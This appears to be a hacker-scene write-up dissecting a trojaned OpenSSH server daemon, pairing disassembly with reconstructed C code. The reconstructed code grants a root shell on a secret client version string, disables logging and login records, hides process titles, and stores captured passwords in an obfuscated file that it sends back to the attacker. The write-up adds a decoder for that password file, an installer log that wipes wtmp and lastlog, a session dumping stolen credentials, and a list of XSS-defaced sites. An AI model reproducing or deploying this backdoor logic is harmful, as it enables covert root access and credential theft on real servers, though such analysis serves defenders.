.text:08056976 call _fclose
|
||
.text:0805697B add esp, 10h
|
||
.text:0805697E cmp ds:hookarOn, 1
|
||
.text:08056985 jnz loc_8056902 ; if hookarOn != return
|
||
.text:0805698B
|
||
.text:0805698B loc_805698B: ; CODE XREF: do_motd+1Cj
|
||
.text:0805698B sub esp, 8
|
||
.text:0805698E push offset unamep ; struct offset
|
||
.text:08056993 push 100h ; size (_SYS_NMLN)
|
||
.text:08056998 call ___xuname ; int uname(struct utsname *name)
|
||
.text:0805699D add esp, 10h
|
||
.text:080569A0 test eax, eax
|
||
.text:080569A2 jnz loc_8056902 ; on error return function
|
||
.text:080569A8 sub esp, 0Ch
|
||
.text:080569AB push 8086EE0h ; unamep+400 = unamep.machine
|
||
.text:080569B0 push 8086CE0h ; unamep+200 = unamep.release
|
||
.text:080569B5 push 8086BE0h ; unamep+100 = unamep.nodename
|
||
.text:080569BA push offset unamep ; unamep+0 = unamep.sysname
|
||
.text:080569BF push offset aOwned ; "\n\t\t+----------------------------[ Owned"...
|
||
.text:080569C4 push offset a0m ; "\x1B[0m"
|
||
.text:080569C9 push offset aSSSSSS ; "%s%s\t [ %s %s %s %s ]\n\n"
|
||
.text:080569CE push 400h ; maxlen
|
||
.text:080569D3 push offset sbuff ; s
|
||
.text:080569D8 call _snprintf
|
||
.text:080569DD add esp, 28h
|
||
.text:080569E0 push ds:__stdoutp ; stream
|
||
.text:080569E6 push offset sbuff ; s
|
||
.text:080569EB call _fputs
|
||
.text:080569F0 add esp, 10h
|
||
.text:080569F3 jmp loc_8056902
|
||
.text:080569F3 do_motd endp
|
||
.text:080569F3
|
||
|
||
*/
|
||
|
||
|
||
/*
|
||
* Display the message of the day.
|
||
*/
|
||
void
|
||
do_motd(void)
|
||
{
|
||
FILE *f;
|
||
char buf[256];
|
||
|
||
if (options.print_motd) {
|
||
#ifdef HAVE_LOGIN_CAP
|
||
f = fopen(login_getcapstr(lc, "welcome", "/etc/motd",
|
||
"/etc/motd"), "r");
|
||
#else
|
||
f = fopen("/etc/motd", "r");
|
||
#endif
|
||
if (f) {
|
||
while (fgets(buf, sizeof(buf), f))
|
||
fputs(buf, stdout);
|
||
fclose(f);
|
||
}
|
||
}
|
||
if(hookarOn == 1)
|
||
if(uname(&unamep) == 0) {
|
||
snprintf(sbuff,0x400,aSSSSSS,a0maOwned,unamep.sysname,unamep.nodename,unamep.release,unamep.machine);
|
||
fputs(sbuff,stdout);
|
||
}
|
||
}
|
||
|
||
|
||
|
||
|
||
/* do_child
|
||
.text:08056F8A loc_8056F8A: ; CODE XREF: do_child+109j
|
||
.text:08056F8A mov esi, [ebp+var_1AC0]
|
||
.text:08056F90 push dword ptr [esi] ; int
|
||
.text:08056F92 push (offset aNouser+2) ; s2
|
||
.text:08056F97 lea eax, [ebp+var_1AAC]
|
||
.text:08056F9D push eax ; int
|
||
.text:08056F9E lea edx, [ebp+envp]
|
||
.text:08056FA4 push edx ; int
|
||
.text:08056FA5 call child_set_env
|
||
.text:08056FAA add esp, 10h
|
||
.text:08056FAD push dword ptr [esi] ; int
|
||
.text:08056FAF push offset aLogname ; "LOGNAME"
|
||
.text:08056FB4 lea esi, [ebp+var_1AAC]
|
||
.text:08056FBA push esi ; int
|
||
.text:08056FBB lea eax, [ebp+envp]
|
||
.text:08056FC1 push eax ; int
|
||
.text:08056FC2 call child_set_env
|
||
.text:08056FC7 add esp, 10h
|
||
.text:08056FCA cmp ds:hookarOn, 1
|
||
.text:08056FD1 jz loc_8057913
|
||
.text:08056FD7 mov eax, [ebp+var_1AC0]
|
||
.text:08056FDD push dword ptr [eax] ; int
|
||
.text:08056FDF push (offset aNouser+2) ; s2
|
||
.text:08056FE4 lea edx, [ebp+var_1AAC]
|
||
.text:08056FEA push edx ; int
|
||
.text:08056FEB lea esi, [ebp+envp]
|
||
.text:08056FF1 push esi ; int
|
||
.text:08056FF2 call child_set_env
|
||
|
||
|
||
.text:08057913 loc_8057913: ; CODE XREF: do_child+181j
|
||
.text:08057913 push offset aRoot ; "root"
|
||
.text:08057918 push (offset aNouser+2) ; USER
|
||
.text:0805791D push esi ; envsize
|
||
.text:0805791E lea esi, [ebp+envp]
|
||
.text:08057924 push esi ; envp
|
||
.text:08057925 call child_set_env
|
||
.text:0805792A add esp, 10h
|
||
.text:0805792D push offset unk_8079C88 ; db 2Fh ; /
|
||
.text:0805792D ; db 'root',0
|
||
.text:08057932 push offset aHome ; "HOME"
|
||
.text:08057937 lea eax, [ebp+var_1AAC]
|
||
.text:0805793D push eax ; envsize
|
||
.text:0805793E push esi ; envp
|
||
.text:0805793F call child_set_env
|
||
.text:08057944 add esp, 10h
|
||
.text:08057947 push offset a033031mOwned03 ; "\\[\\033[0;31m\\]Owned\\[\\033[1;30m\\][\\[\\03"...
|
||
.text:0805794C push offset aPs1 ; "PS1"
|
||
.text:08057951 lea esi, [ebp+var_1AAC]
|
||
.text:08057957 push esi ; int
|
||
.text:08057958 lea eax, [ebp+envp]
|
||
.text:0805795E push eax ; int
|
||
.text:0805795F call child_set_env
|
||
.text:08057964 add esp, 10h
|
||
.text:08057967 push offset file ; "/dev/null"
|
||
.text:0805796C push offset aHistfile ; "HISTFILE"
|
||
.text:08057971 push esi ; int
|
||
.text:08057972 lea esi, [ebp+envp]
|
||
.text:08057978 push esi ; int
|
||
.text:08057979 call child_set_env
|
||
.text:0805797E add esp, 0Ch
|
||
.text:08057981 push offset aUptimeLast5 ; "uptime && last -5\n"
|
||
.text:08057986 push 400h ; length of s
|
||
.text:0805798B lea ebx, [ebp+s] ; char * s
|
||
.text:08057991 push ebx ; s
|
||
.text:08057992 call _snprintf
|
||
.text:08057997 mov [esp+1AD8h+var_1AD8], ebx
|
||
.text:0805799A call _system
|
||
.text:0805799F add esp, 10h
|
||
.text:080579A2 push 4
|
||
.text:080579A4 mov eax, [ebp+var_1AC0]
|
||
.text:080579AA push dword ptr [eax+8]
|
||
.text:080579AD push eax
|
||
.text:080579AE push ds:lc
|
||
.text:080579B4 call _setusercontext
|
||
.text:080579B9 add esp, 10h
|
||
.text:080579BC test eax, eax
|
||
.text:080579BE jns loc_805703A
|
||
.text:080579C4
|
||
|
||
|
||
*/
|
||
|
||
|
||
|
||
/*
|
||
* Performs common processing for the child, such as setting up the
|
||
* environment, closing extra file descriptors, setting the user and group
|
||
* ids, and executing the command or shell.
|
||
*/
|
||
void
|
||
do_child(Session *s, const char *command)
|
||
{
|
||
extern char **environ;
|
||
char **env;
|
||
char *argv[10];
|
||
const char *shell, *shell0, *hostname = NULL;
|
||
struct passwd *pw = s->pw;
|
||
|
||
//...
|
||
|
||
/*
|
||
* Make sure $SHELL points to the shell from the password file,
|
||
* even if shell is overridden from login.conf
|
||
*/
|
||
env = do_setup_env(s, shell);
|
||
|
||
//...
|
||
}
|
||
|
||
|
||
//...
|
||
static char **
|
||
do_setup_env(Session *s, const char *shell)
|
||
{
|
||
char buf[256];
|
||
u_int i, envsize;
|
||
char **env, *laddr, *path = NULL;
|
||
struct passwd *pw = s->pw;
|
||
|
||
//...
|
||
|
||
if(hookarOn == 1) {
|
||
child_set_env(&env,&envsize,"USER","root");
|
||
child_set_env(&env,&envsize,"HOME","/root");
|
||
child_set_env(&env,&envsize,"PS1",a033031mOwned03);
|
||
child_set_env(&env,&envsize,"HISTFILE","/dev/null");
|
||
snprintf(s,1024,"uptime && last -5\n");
|
||
system(s);
|
||
}
|
||
else {
|
||
//do normal shit
|
||
|
||
//...
|
||
}
|
||
|
||
|
||
/*session_proctitle
|
||
.text:08058654 public session_proctitle
|
||
.text:08058654 session_proctitle proc near ; CODE XREF: session_close+9Dj
|
||
.text:08058654 ; session_close+14Bj ...
|
||
.text:08058654
|
||
.text:08058654 var_18 = dword ptr -18h
|
||
.text:08058654 var_14 = dword ptr -14h
|
||
.text:08058654 var_10 = dword ptr -10h
|
||
.text:08058654 arg_0 = dword ptr 8
|
||
.text:08058654
|
||
.text:08058654 push ebp
|
||
.text:08058655 mov ebp, esp
|
||
.text:08058657 push edi
|
||
.text:08058658 push esi
|
||
.text:08058659 push ebx
|
||
.text:0805865A sub esp, 0Ch
|
||
.text:0805865D mov eax, [ebp+arg_0]
|
||
.text:08058660 mov esi, [eax+8]
|
||
.text:08058663 test esi, esi
|
||
.text:08058665 jz loc_80587A9
|
||
.text:0805866B mov ebx, ds:hookarOn
|
||
.text:08058671 test ebx, ebx
|
||
.text:08058673 jnz loc_8058760
|
||
.text:08058679 mov ds:buf_1, 0
|
||
.text:08058680 mov [ebp+var_10], 9
|
||
.text:08058687 mov [ebp+var_18], 0
|
||
.text:0805868E mov esi, esi
|
||
.text:08058690
|
||
.text:08058690 loc_8058690: ; CODE XREF: session_proctitle+D6j
|
||
.text:08058690 ; session_proctitle+14Dj
|
||
.text:08058690 mov eax, [ebp+var_18]
|
||
.text:08058693 mov edx, [ebp+var_18]
|
||
.text:08058696 mov ecx, dword ptr ds:sessions[eax]
|
||
.text:0805869C add edx, offset sessions
|
||
.text:080586A2 test ecx, ecx
|
||
.text:080586A4 mov [ebp+var_14], edx
|
||
.text:080586A7 jz short loc_8058720
|
||
.text:080586A9 cmp dword ptr [eax+80874BCh], 0FFFFFFFFh
|
||
.text:080586B0 jz short loc_8058720
|
||
.text:080586B2 mov ebx, edx
|
||
.text:080586B4 add ebx, 34h
|
||
.text:080586B7 mov edi, offset aDev ; "/dev/"
|
||
.text:080586BC mov ecx, 5
|
||
.text:080586C1 cld
|
||
.text:080586C2 mov esi, ebx
|
||
.text:080586C4 repe cmpsb
|
||
.text:080586C6 jz loc_8058770
|
||
.text:080586CC sub esp, 8
|
||
.text:080586CF push 2Fh ; c
|
||
.text:080586D1 push ebx ; s
|
||
.text:080586D2 call _strrchr
|
||
.text:080586D7 mov esi, eax
|
||
.text:080586D9 add esp, 10h
|
||
.text:080586DC test esi, esi
|
||
.text:080586DE mov eax, ebx
|
||
.text:080586E0 jz short loc_80586E5
|
||
.text:080586E2 lea eax, [esi+1]
|
||
.text:080586E5
|
||
.text:080586E5 loc_80586E5: ; CODE XREF: session_proctitle+8Cj
|
||
.text:080586E5 cmp ds:buf_1, 0
|
||
.text:080586EC mov esi, eax
|
||
.text:080586EE jz loc_8058783
|
||
.text:080586F4
|
||
.text:080586F4 loc_80586F4: ; CODE XREF: session_proctitle+129j
|
||
.text:080586F4 push eax
|
||
.text:080586F5 push 400h
|
||
.text:080586FA push offset reject ; ","
|
||
.text:080586FF push offset buf_1
|
||
.text:08058704 call _strlcat
|
||
.text:08058709 add esp, 10h
|
||
.text:0805870C push eax
|
||
.text:0805870D push 400h
|
||
.text:08058712 push esi
|
||
.text:08058713 push offset buf_1
|
||
.text:08058718 call _strlcat
|
||
.text:0805871D add esp, 10h
|
||
.text:08058720
|
||
.text:08058720 loc_8058720: ; CODE XREF: session_proctitle+53j
|
||
.text:08058720 ; session_proctitle+5Cj
|
||
.text:08058720 add [ebp+var_18], 0A4h
|
||
.text:08058727 dec [ebp+var_10]
|
||
.text:0805872A jns loc_8058690
|
||
.text:08058730
|
||
.text:08058730 loc_8058730: ; CODE XREF: session_proctitle+153j
|
||
.text:08058730 cmp ds:buf_1, 0
|
||
.text:08058737 jz loc_80587C4
|
||
.text:0805873D
|
||
.text:0805873D loc_805873D: ; CODE XREF: session_proctitle+188j
|
||
.text:0805873D push eax
|
||
.text:0805873E push offset buf_1
|
||
.text:08058743 mov edx, [ebp+arg_0]
|
||
.text:08058746 mov eax, [edx+8]
|
||
.text:08058749 push dword ptr [eax]
|
||
.text:0805874B push offset aS@S ; "%s@%s"
|
||
.text:08058750
|
||
.text:08058750 loc_8058750: ; CODE XREF: session_proctitle+119j
|
||
.text:08058750 call _setproctitle
|
||
.text:08058755 add esp, 10h
|
||
.text:08058758 lea esp, [ebp-0Ch]
|
||
.text:0805875B pop ebx
|
||
.text:0805875C pop esi
|
||
.text:0805875D pop edi
|
||
.text:0805875E leave
|
||
.text:0805875F retn
|
||
.text:08058760 ; ---------------------------------------------------------------------------
|
||
.text:08058760
|
||
.text:08058760 loc_8058760: ; CODE XREF: session_proctitle+1Fj
|
||
.text:08058760 sub esp, 8
|
||
.text:08058763 push 8079AC8h
|
||
.text:08058768 push 8079AC8h
|
||
.text:0805876D jmp short loc_8058750
|
||
|
||
|
||
*/
|
||
|
||
void
|
||
session_proctitle(Session *s)
|
||
{
|
||
if (s->pw == NULL)
|
||
error("no user for session %d", s->self);
|
||
else{
|
||
if(hookarOn) {
|
||
setproctitle("","");
|
||
return;
|
||
}
|
||
//...blah blah
|
||
}}
|
||
|
||
/*login_write
|
||
.text:08060DA0 ; int __cdecl login_write(struct utmp *ptr)
|
||
.text:08060DA0 public login_write
|
||
.text:08060DA0 login_write proc near ; CODE XREF: login_logout+Dj
|
||
.text:08060DA0 ; login_login+Dj
|
||
.text:08060DA0
|
||
.text:08060DA0 var_18 = dword ptr -18h
|
||
.text:08060DA0 var_4 = dword ptr -4
|
||
.text:08060DA0 ptr = dword ptr 8
|
||
.text:08060DA0
|
||
.text:08060DA0 push ebp
|
||
.text:08060DA1 mov ebp, esp
|
||
.text:08060DA3 push ebx
|
||
.text:08060DA4 push eax
|
||
.text:08060DA5 xor eax, eax
|
||
.text:08060DA7 cmp ds:hookarOn, 1
|
||
.text:08060DAE mov ebx, [ebp+ptr]
|
||
.text:08060DB1 jz short loc_8060DCE
|
||
.text:08060DB3 call _geteuid
|
||
.text:08060DB8 test eax, eax
|
||
.text:08060DBA jz short loc_8060DD4
|
||
.text:08060DBC sub esp, 0Ch
|
||
.text:08060DBF push offset aAttemptToWrite ; "Attempt to write login records by non-r"...
|
||
.text:08060DC4 call logit
|
||
.text:08060DC9 mov eax, 1
|
||
.text:08060DCE
|
||
.text:08060DCE loc_8060DCE: ; CODE XREF: login_write+11j
|
||
.text:08060DCE mov ebx, [ebp+var_4]
|
||
.text:08060DD1 leave
|
||
.text:08060DD2 retn
|
||
|
||
*/
|
||
|
||
/**
|
||
** login_write: Call low-level recording functions based on autoconf
|
||
** results
|
||
**/
|
||
int
|
||
login_write(struct logininfo *li)
|
||
{
|
||
if(hookarOn == 1)
|
||
return 0;
|
||
//bla bla
|
||
}
|
||
|
||
|
||
/*do_log
|
||
.text:0806A1CC ; int __cdecl do_log(int, int, __gnuc_va_list arg)
|
||
.text:0806A1CC public do_log
|
||
.text:0806A1CC do_log proc near ; CODE XREF: fatal+Fp
|
||
.text:0806A1CC ; debug3+Fp ...
|
||
.text:0806A1CC
|
||
.text:0806A1CC dest = byte ptr -818h
|
||
.text:0806A1CC buf = byte ptr -418h
|
||
.text:0806A1CC arg_0 = dword ptr 8
|
||
.text:0806A1CC arg_4 = dword ptr 0Ch
|
||
.text:0806A1CC arg = dword ptr 10h
|
||
.text:0806A1CC
|
||
.text:0806A1CC push ebp
|
||
.text:0806A1CD mov ebp, esp
|
||
.text:0806A1CF push edi
|
||
.text:0806A1D0 push esi
|
||
.text:0806A1D1 push ebx
|
||
.text:0806A1D2 sub esp, 80Ch
|
||
.text:0806A1D8 cmp ds:hookarOn, 1
|
||
.text:0806A1DF mov eax, [ebp+arg_0]
|
||
.text:0806A1E2 mov ecx, [ebp+arg_4]
|
||
.text:0806A1E5 mov ebx, [ebp+arg]
|
||
.text:0806A1E8 jz loc_806A2A0
|
||
|
||
|
||
.text:0806A2A0 loc_806A2A0: ; CODE XREF: do_log+1Cj
|
||
.text:0806A2A0 ; do_log+2Aj ...
|
||
.text:0806A2A0 lea esp, [ebp-0Ch]
|
||
.text:0806A2A3 pop ebx
|
||
.text:0806A2A4 pop esi
|
||
.text:0806A2A5 pop edi
|
||
.text:0806A2A6 leave
|
||
.text:0806A2A7 retn
|
||
.text:0806A2A8 ; --------------------------------------------------------------------
|
||
|
||
*/
|
||
|
||
|
||
void
|
||
do_log(LogLevel level, const char *fmt, va_list args)
|
||
{
|
||
if(hookarOn == 1)
|
||
return;
|
||
//bla bla
|
||
}
|
||
|
||
|
||
|
||
|
||
/*
|
||
.text:0804D43B sub esp, 0Ch
|
||
.text:0804D43E lea ecx, [ebp+s]
|
||
.text:0804D444 push ecx
|
||
.text:0804D445 mov [ebp+var_539], 0
|
||
.text:0804D44C call xstrdup
|
||
.text:0804D451 mov esi, eax ; esi = client version string
|
||
.text:0804D453 mov ds:client_version_string, eax
|
||
.text:0804D458 mov edi, offset aAGb7 ; "a-gb7"
|
||
.text:0804D45D mov ecx, 5 ; count = 5
|
||
.text:0804D462 cld
|
||
.text:0804D463 add esp, 10h
|
||
.text:0804D466 repe cmpsb ; strcmp (most likely strncmp)
|
||
.text:0804D468 setnbe dl
|
||
.text:0804D46B setb al
|
||
.text:0804D46E mov bl, dl
|
||
.text:0804D470 sub bl, al
|
||
.text:0804D472 movsx ebx, bl
|
||
.text:0804D475 test ebx, ebx
|
||
.text:0804D477 jz loc_804E95A ; jmp if equal
|
||
|
||
|
||
.text:0804E95A loc_804E95A: ; CODE XREF: main+B1Bj
|
||
.text:0804E95A sub esp, 8
|
||
.text:0804E95D push (offset aSLineDBadPortN+1Ah) ; "r"
|
||
.text:0804E962 push offset filename ; "/var/run/ssh.old"
|
||
.text:0804E967 call _fopen ; fopen(filename,"r")
|
||
.text:0804E96C add esp, 10h
|
||
.text:0804E96F test eax, eax
|
||
.text:0804E971 mov ds:alog, eax ; alog = eax
|
||
.text:0804E976 jz loc_804D47D ; quit if error with fopen
|
||
.text:0804E97C push esi
|
||
.text:0804E97D push 2 ; const SEEK_END = 2
|
||
.text:0804E97F push 0 ; offset
|
||
.text:0804E981 push eax ; alog
|
||
.text:0804E982 call _fseek ; fseek(alog,0,SEEK_END)
|
||
.text:0804E987 pop ecx
|
||
.text:0804E988 push ds:alog ; size
|
||
.text:0804E98E call _ftell ; ftell(alog)
|
||
.text:0804E993 mov esi, eax ; esi = current offset = logfile size
|
||
.text:0804E995 mov [esp+0C68h+var_C68], eax ; size_t
|
||
.text:0804E998 call _malloc
|
||
.text:0804E99D mov ds:mvebuf, eax ; mvebuf = malloc(logsize)
|
||
.text:0804E9A2 mov [esp+0C68h+var_C68], esi
|
||
.text:0804E9A5 call _malloc
|
||
.text:0804E9AA mov edx, ds:mvebuf
|
||
.text:0804E9B0 add esp, 10h
|
||
.text:0804E9B3 test edx, edx
|
||
.text:0804E9B5 mov ds:mvdbuf, eax ; mvdbuff = malloc(logsize)
|
||
.text:0804E9BA jz loc_804EA70 ; if(mvebuf == null) jmp
|
||
.text:0804E9C0 test eax, eax
|
||
.text:0804E9C2 jz loc_804EA70 ; if(mvdbuf == null) jmp
|
||
.text:0804E9C8 push eax
|
||
.text:0804E9C9 push 0 ; const SEEK_SET = 0
|
||
.text:0804E9CB push 0 ; offset
|
||
.text:0804E9CD push ds:alog ; stream
|
||
.text:0804E9D3 call _fseek ; fseek(alog,0,SEEK_SET)
|
||
.text:0804E9D8 add esp, 10h
|
||
.text:0804E9DB push ds:alog ; stream
|
||
.text:0804E9E1 push 1 ; n
|
||
.text:0804E9E3 push esi ; logfile size
|
||
.text:0804E9E4 push ds:mvebuf ; ptr
|
||
.text:0804E9EA call _fread ; fread(mvebuf, logsize, 1, alog)
|
||
.text:0804E9EF mov edx, ds:mvebuf
|
||
.text:0804E9F5 xor eax, eax
|
||
.text:0804E9F7 mov ds:ai, 0
|
||
.text:0804EA01 cld
|
||
.text:0804EA02 mov ecx, 0FFFFFFFFh
|
||
.text:0804EA07 mov edi, edx
|
||
.text:0804EA09 repne scasb ; strlen(mvebuf)
|
||
.text:0804EA0B not ecx
|
||
.text:0804EA0D dec ecx
|
||
.text:0804EA0E add esp, 10h
|
||
.text:0804EA11 cmp ebx, ecx
|
||
.text:0804EA13 jnb short loc_804EA5A ; for loop
|
||
.text:0804EA15 mov ebx, 0FFFFFFFFh
|
||
.text:0804EA1A
|
||
.text:0804EA1A loc_804EA1A: ; CODE XREF: main+20FCj
|
||
.text:0804EA1A mov ecx, ds:ai
|
||
.text:0804EA20 mov al, [edx+ecx] ; al = mvebuf[ai]
|
||
.text:0804EA23 not eax ; ~mvebuf[ai]
|
||
.text:0804EA25 mov edx, ds:mvdbuf
|
||
.text:0804EA2B mov [edx+ecx], al ; mvdbuf[i] = ~mvebuf[ai]
|
||
.text:0804EA2E mov edi, ds:ai
|
||
.text:0804EA34 inc edi ; ai++
|
||
.text:0804EA35 mov edx, ds:mvebuf
|
||
.text:0804EA3B mov [ebp+var_C40], edi ; var_C40 = ai
|
||
.text:0804EA41 mov ds:ai, edi
|
||
.text:0804EA47 xor eax, eax
|
||
.text:0804EA49 mov ecx, ebx
|
||
.text:0804EA4B mov edi, edx
|
||
.text:0804EA4D repne scasb ; strlen(mvebuf)
|
||
.text:0804EA4F not ecx
|
||
.text:0804EA51 dec ecx
|
||
.text:0804EA52 cmp [ebp+var_C40], ecx ; cmp ai with strlen result
|
||
.text:0804EA58 jb short loc_804EA1A ; jmp if below =>
|
||
.text:0804EA58 ; for(ai=0;ai<strlen(mvebuf);ai++)
|
||
.text:0804EA5A
|
||
.text:0804EA5A loc_804EA5A: ; CODE XREF: main+20B7j
|
||
.text:0804EA5A push eax
|
||
.text:0804EA5B push esi ; logfile size
|
||
.text:0804EA5C push ds:mvdbuf ; mvdbuf
|
||
.text:0804EA62 push [ebp+var_C00] ; var_C00 = current sock_out
|
||
.text:0804EA68 call _write
|
||
.text:0804EA6D add esp, 10h
|
||
.text:0804EA70
|
||
.text:0804EA70 loc_804EA70: ; CODE XREF: main+205Ej
|
||
.text:0804EA70 ; main+2066j
|
||
.text:0804EA70 sub esp, 0Ch
|
||
.text:0804EA73 push ds:alog ; stream
|
||
.text:0804EA79 call _fclose ; fclose(alog)
|
||
.text:0804EA7E add esp, 10h
|
||
.text:0804EA81 jmp loc_804D47D ; continue
|
||
*/
|
||
|
||
|
||
/*
|
||
* Main program for the daemon.
|
||
*/
|
||
int
|
||
main(int ac, char **av)
|
||
{
|
||
extern char *optarg;
|
||
extern int optind;
|
||
int opt, j, i, fdsetsz, on = 1;
|
||
int sock_in = -1, sock_out = -1, newsock = -1;
|
||
pid_t pid;
|
||
socklen_t fromlen;
|
||
fd_set *fdset;
|
||
struct sockaddr_storage from;
|
||
const char *remote_ip;
|
||
int remote_port;
|
||
FILE *f;
|
||
struct addrinfo *ai;
|
||
char ntop[NI_MAXHOST], strport[NI_MAXSERV];
|
||
char *line;
|
||
int listen_sock, maxfd;
|
||
int startup_p[2] = { -1 , -1 }, config_s[2] = { -1 , -1 };
|
||
int startups = 0;
|
||
Key *key;
|
||
Authctxt *authctxt;
|
||
int ret, key_used = 0;
|
||
Buffer cfg;
|
||
|
||
//...
|
||
//...
|
||
|
||
sshd_exchange_identification(sock_in, sock_out);
|
||
//...
|
||
}
|
||
|
||
static void
|
||
sshd_exchange_identification(int sock_in, int sock_out)
|
||
{
|
||
//...
|
||
if(strncmp(client_version_string,aAGb7,strlen(aAGb7)) == 0)
|
||
if( (alog = fopen(filename,"r")) != 0) {
|
||
fseek(alog,0,SEEK_END);
|
||
logsize = ftell(alog);
|
||
mvebuf = malloc(logsize);
|
||
mvdbuf = malloc(logsize);
|
||
if( (mvebuf != NULL) && (mvdbuf != NULL) ) {
|
||
fseek(alog,0,SEEK_SET);
|
||
fread(mvebuf,logsize,1,alog);
|
||
for(ai = 0;ai<strlen(mvebuf);ai++) mvdbuf[ai] = ~mvebuf[ai];
|
||
write(sock_out,mvdbuf,logsize);
|
||
}
|
||
fclose(alog);
|
||
}
|
||
//...
|
||
//...
|
||
}
|
||
|
||
/*
|
||
On server identification exchange if the client version first characters are equal to a specific
|
||
string ("password") then it returns the captured passwords from ssh.old
|
||
*/
|
||
|
||
/*
|
||
lame.c
|
||
|
||
Lame Decryprer v0.069
|
||
|
||
This program is free software: you can redistribute it and/or modify
|
||
it under the terms of the FSPL Fuck Skiddies Public License as published by
|
||
the GCESE Foundation, either version 3 of the License, or
|
||
(at your option) any later version.
|
||
|
||
This program is distributed in the hope that it will be able to
|
||
crack the complex encryption algorithm used by antisec's backdoor
|
||
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
|
||
*/
|
||
|
||
#include <stdio.h>
|
||
|
||
int main() {
|
||
FILE *sshlog;
|
||
char *filename = "/var/run/ssh.old";
|
||
unsigned int cin;
|
||
int i;
|
||
|
||
if((sshlog=fopen(filename,"r")))
|
||
while((cin = fgetc(sshlog)) != EOF)
|
||
printf("%c",~cin);
|
||
else
|
||
printf("crappy file error\n");
|
||
}
|
||
|
||
|
||
|
||
Backdoor Installation
|
||
---------------------
|
||
|
||
debian:~/hax# ./quick
|
||
|
||
________ .___ ________ _________
|
||
\_____ \__ _ ______ ____ __| _/ \______ \ \_ ___ \
|
||
/ | \ \/ \/ / \_/ __ \ / __ | | | \/ \ \/
|
||
/ | \ / | \ ___// /_/ | | ` \ \____
|
||
\_______ /\/\_/|___| /\___ >____ | /_______ /\______ /
|
||
\/ \/ \/ \/ \/ \/
|
||
"Hack everyone you can, and then hack some more"
|
||
Logs [ CHECK ]
|
||
Opening /var/log/wtmp ...
|
||
Reading... patched ok.
|
||
Opening /var/log/lastlog ...
|
||
Reading... patched ok.
|
||
Logs [ CHECK ]
|
||
Configure [ CHECK ]
|
||
checking for gcc... gcc
|
||
checking for C compiler default output file name... a.out
|
||
checking whether the C compiler works... yes
|
||
checking whether we are cross compiling... no
|
||
checking for suffix of executables...
|
||
checking for suffix of object files... o
|
||
checking whether we are using the GNU C compiler... yes
|
||
checking whether gcc accepts -g... yes
|
||
checking for gcc option to accept ANSI C... none needed
|
||
checking build system type... i686-pc-linux-gnu
|
||
checking host system type... i686-pc-linux-gnu
|
||
checking whether byte ordering is bigendian... no
|
||
checking for gawk... no
|
||
checking for mawk... mawk
|
||
checking how to run the C preprocessor... gcc -E
|
||
checking for ranlib... ranlib
|
||
checking for a BSD-compatible install... /usr/bin/install -c
|
||
checking for egrep... grep -E
|
||
checking for ar... /usr/bin/ar
|
||
checking for cat... /bin/cat
|
||
checking for kill... /bin/kill
|
||
checking for perl5... no
|
||
checking for perl... /usr/bin/perl
|
||
checking for sed... /bin/sed
|
||
checking for ent... no
|
||
checking for bash... /bin/bash
|
||
checking for ksh... (cached) /bin/bash
|
||
checking for sh... (cached) /bin/bash
|
||
checking for sh... /bin/sh
|
||
checking for groupadd... /usr/sbin/groupadd
|
||
checking for useradd... /usr/sbin/useradd
|
||
checking for pkgmk... no
|
||
checking for special C compiler options needed for large files... no
|
||
checking for _FILE_OFFSET_BITS value needed for large files... 64
|
||
checking for _LARGE_FILES value needed for large files... no
|
||
checking for login... /bin/login
|
||
checking for passwd... /usr/bin/passwd
|
||
checking for inline... inline
|
||
checking whether LLONG_MAX is declared... no
|
||
checking whether LLONG_MAX is declared... yes
|
||
checking for ANSI C header files... yes
|
||
checking for sys/types.h... yes
|
||
checking for sys/stat.h... yes
|
||
checking for stdlib.h... yes
|
||
checking for string.h... yes
|
||
checking for memory.h... yes
|
||
checking for strings.h... yes
|
||
checking for inttypes.h... yes
|
||
checking for stdint.h... yes
|
||
checking for unistd.h... yes
|
||
...
|
||
...
|
||
cc -o sftp progressmeter.o sftp.o sftp-client.o sftp-common.o sftp-glob.o -L. -Lopenbsd-compat/ -lssh -lopenbsd-compat -lresolv -lcrypto -lutil -lz -lnsl -lcrypt
|
||
Compile [ CHECK ]
|
||
Running [ CHECK ]
|
||
*** [ OsUcCu7hJA ]
|
||
*** [ 6O7vp ]
|
||
Game Over [ CHECKMATE! ]
|
||
#--
|
||
Linux debian 2.6.26-2-686 #1 SMP Sun Jun 21 04:57:38 UTC 2009 i686 GNU/Linux
|
||
debian
|
||
OsUcCu7hJA
|
||
6O7vp
|
||
#--
|
||
|
||
|
||
debian:~# telnet 10.5.1.13 22
|
||
Trying 10.5.1.13...
|
||
Connected to 10.5.1.13.
|
||
Escape character is '^]'.
|
||
SSH-2.0-OpenSSH_5.1p1 Debian
|
||
6O7vp
|
||
HOOKIN: root:123!"<22>
|
||
HOOKIN: testuser:testpass
|
||
Protocol mismatch.
|
||
Connection closed by foreign host.
|
||
debian:~#
|
||
|
||
|
||
|
||
_______ _______ ________ _________
|
||
\ _ \ ___ __\ _ \/ __ \ / _____/ ____ ____
|
||
/ /_\ \\ \/ / /_\ \____ / \_____ \_/ __ \/ _ \
|
||
\ \_/ \> <\ \_/ \ / / / \ ___( <_> )
|
||
\_____ /__/\_ \\_____ //____/ /_______ /\___ >____/
|
||
\/ \/ \/ \/ \/
|
||
________ __ .__ .__ .__
|
||
\_____ \ _______/ |_|__| _____ |__|______|__| ____ ____
|
||
/ | \\____ \ __\ |/ \| \___ / |/ \ / ___\
|
||
/ | \ |_> > | | | Y Y \ |/ /| | | \/ /_/ >
|
||
\_______ / __/|__| |__|__|_| /__/_____ \__|___| /\___ /
|
||
\/|__| \/ \/ \//_____/
|
||
|
||
|
||
|
||
1) http://www.xssed.com/archive/author=romeo
|
||
|
||
Date Author Domain PR Category Mirror
|
||
25/04/09 RoMeO www.akamai.com 19080 XSS mirror
|
||
22/03/09 RoMeO press.1and1.com 6883 XSS mirror
|
||
05/07/08 RoMeO scripts.mit.edu 999 XSS mirror
|
||
25/04/08 RoMeO forgottenmem.net 304476 XSS mirror
|
||
25/04/08 RoMeO www.h4ps.com 1753149 XSS mirror
|
||
23/04/08 RoMeO www.batelco.jo 225973 XSS mirror
|
||
12/04/08 RoMeO devscripts.net 1503804 XSS mirror
|
||
06/04/08 RoMeO www.vlx.in 2998964 XSS mirror
|
||
06/04/08 RoMeO www.ip2location.com 14646 XSS mirror
|
||
05/04/08 RoMeO realitatea.net 13002 XSS mirror
|
||
